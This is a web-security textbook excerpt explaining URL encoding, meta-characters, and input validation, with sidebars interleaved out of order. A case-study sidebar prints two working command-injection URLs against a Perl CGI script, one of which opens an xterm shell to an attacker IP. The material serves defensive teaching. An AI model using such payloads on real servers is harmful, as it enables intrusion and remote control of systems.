URL Encoding

URL Encoding

By themselves, URLs are nothing but alphanumeric strings, with some other symbols thrown in. The character set chosen to express a URL string consists of the following symbols:

Symbols

Values

Alphanumeric symbols

A-Z, a-z, 0-9

Reserved symbols

; / ? : @ & = + $ , < > # % "

Other special characters

- _ . ! ~ * ' ( ) {} | \^ [ ] `

For the most part, a URL string consists of letters, numbers, and reserved symbols that have special meaning within the URL string. Other special characters are found in some URL strings, although they don't have any special meaning as far as the URL is concerned. However, they may have special meaning for the Web server receiving the URL or the application that is requested via the Web server.

Interpretations of some of these special characters are presented in Table 5-2.

Meta-Characters

Characters such as * and ; and | and ` have special meanings as meta-characters in applications and scripts. These characters don't affect the URL in any way, but if they end up making their way into applications, they may change the meaning of the input altogether and sometimes create gaping security holes.

Table 5-2. Special Characters and Their Meaning Within a URL

Special Characters

Interpretation

?

Query String separator. The part of the URL string to the right of the ? symbol is the Query String.

&

Parameter delimiter. Used to separate name=value parameter pairs on the Query String.

=

Separates the parameter name from the parameter value while passing parameters, using the Query String.

+

Is translated into a space.

:

Protocol separator. The portion of the URL string from the beginning to the : symbol specifies the application layer protocol to be used when requesting the resource.

#

Used to specify an anchor point within a Web page. For example the URLs http://www.acme-art.com/index.html#gallery and http://www.acme-art.com/index.html#purchase takes you to two different locations within the same page index.html.

%

Used as an escape character for specifying hexadecimal encoded characters.

@

Used in mailto: URLs while specifying Internet e-mail addresses or in passing user login credentials to a password protected resource, especially over FTP.

~

Used for specifying a user's home directory on a multiuser system such as Unix. The URL looks like http://server/~user_login_id/ For example, http://www.cs.purdue.edu/~saumil/maps to the Web page subdirectory within user saumil's account on the system.

Many meta-characters are interpreted differently by different Web servers. Table 5-3 describes how various meta-characters are interpreted inside applications.

Specifying Special Characters on the URL String

The question that arises now is, "What if we want to specify special characters such as % or ? or & or + without giving them any special meaning?" For example, suppose we want to pass two parameters, book=pride&prejudice and shipping=snailmail, on the Query String. In this case, the URL is:

http://mycheapbookshop.com/purchase.cgi?book=pride&predjudice&shipping=snailmail

Table 5-3. Meta-Characters and Their Meanings

Meta-Character

Interpretation/Use

*

The star character is used as a wild card or a file globbing character. In Unix shell scripts, the asterisk character expands to the list of filenames present in the current directory.

;

The semicolon character has many meanings in many different contexts. The most common use of a semicolon is to terminate lines of source code in languages such as C or Perl. In other contexts, the semicolon is also used as a command separator, as in Bourne shell scripts and SQL queries.

|

The pipe character, if sneaked through without proper checking, can play havoc. It is one of the most powerful characters in Unix shell scripts second only to the grave accent character `. The pipe joins two commands by redirecting the standard output of the first command to the standard input of the second command. In Perl scripts, if a pipe character is used as a suffix or prefix to the filename when it is opened, the filename is treated as a system command and is executed by the OS shell. The file handle then receives the output generated by program that is executed.

`

The grave accent character (commonly called a back-tick or a back-quote) is used for command output substitution and is the most powerful character in Unix shell scripting. If a Unix shell command is bounded by grave accents, the output of the command is substituted for it and returned to the receiving variable to which the assignment is made. For example, files=`ls -la` causes the shell variable "files" to be set to the output of the command ls -la.

 

Meta-Characters and Input Validation

The single most prominent cause of over 90% of all Web application vulnerabilities is lack of proper input validation. The concept of input validation isn't new. During our days of writing Fortran code in college, the instructor used to perform manual input validation before giving us credit for the code submitted. One of the programs to be written was to calculate the natural logarithm of a number. None of the students' code ever made it past the first input given by the instructor "banana" when the program was expecting a number! When given unexpected input, the program would crash and dump core. In those days, little did we realize the importance of proper input validation. Making an xterm pop out by forcing meta-characters and Unix commands into a Web page form is perhaps the epitome of elegant Web hacks, attributed entirely to weak input validation.

The result is an ambiguous URL because there are three & symbols in the Query String. Most likely, a Web server would split such a Query String into three parameters instead of two namely, book=pride, prejudice= and shipping=snailmail.

If we want to pass the & symbol as part of the parameter value, the URL specification allows us to express reserved and special characters in a two-digit hexadecimal encoded ASCII format, prefixed with a % symbol, as follows:

Characters

Hex Values

All hex encoded characters

%XX (%00-%FF)

Control characters

%00-%1F, %7F

Upper 8-bit ASCII characters

%80-%FF

Space

%20 or +

Carriage return

%0d

Line feed

%0a

In the preceding example, the ASCII value of the & symbol is 38 in decimal and 26 in hexadecimal. Therefore, if we want to express the & symbol, we can use %26 in its place. The URL in the example would become:

http://mycheapbookshop.com/purchase.cgi?book=pride%26predjudice&shipping=snailmail

Unicode Encoding

Hexadecimal ASCII encoding, while serving purposes for the most part, isn't broad enough to represent character sets larger than 256 symbols. Most modern operating systems and applications support multibyte representations of character sets of languages other than English. Microsoft's IIS Web server supports URLs containing characters encoded with multibyte UCS Translation Format (UTF-8), in addition to hexadecimal ASCII encoding.

The Acme Art, Inc., Hack

Let's take a look at two URLs launched by the attacker on www.acme-art.com, presented in the Part One Case Study. The URLs are:

http://www.acme-art.com/index.cgi?page=|ls+-la+/%0aid%0awhich+xterm|

http://www.acme-art.com/index.cgi?page=|xterm+-isplay+10.0.1.21:0.0+%26|

The hacker used meta-characters and URL encoding carefully. The parameter being passed by page= ends up being used as a filename in the open() function in index.cgi's Perl code. The attacker used the pipe character around the commands to cause Perl to run them and return the output. The first URL has three Unix commands separated by the linefeed character %0A. By hitting the Enter key between each command, the attacker ran the three commands in succession. The second URL throws an xterm back to the attacker's system. Note how the attacker sneaked in the ampersand character as %26, causing the xterm process to be spawned as a background process.

The Universal Character Set (UCS) is defined by the International Standards Organization's draft ISO 10646. Although UCS is maintained by ISO, a separate group was formed (primarily by software vendors) to allow representation of a variety of character sets with one unified scheme. This group came to be known as the Unicode Consortium (http://www.unicode.org). As standards were developed, both Unicode and UCS decided to adopt a common representation scheme so that the computing world didn't have to deal with separate standards for the same thing. UTF-8 encoding is defined in ISO 10646-1:2000 and in RFC 2279. For operating systems that have been designed around the ASCII character encoding scheme, UTF-8 allows for easy conversion and representation of multibyte Unicode characters using ASCII mappings.

Without going into the intricacies of how UTF-8 works, let's look at Unicode encoding from a URL's point of view. Two-byte Unicode characters are encoded by using %uXXYY, where XX and YY are hexadecimal values of the higher and lower byte respectively. For the standard ASCII characters %00 to %FF, the Unicode representation is %u0000 to %u00FF. The Web server decodes 16 bits at a time when dealing with Unicode encoded symbols.

 



Web Hacking(c) Attacks and Defense
Web Hacking: Attacks and Defense
ISBN: 0201761769
EAN: 2147483647
Year: 2005
Pages: 156

flylib.com © 2008-2017.
If you may any questions please contact us: flylib@qtcs.net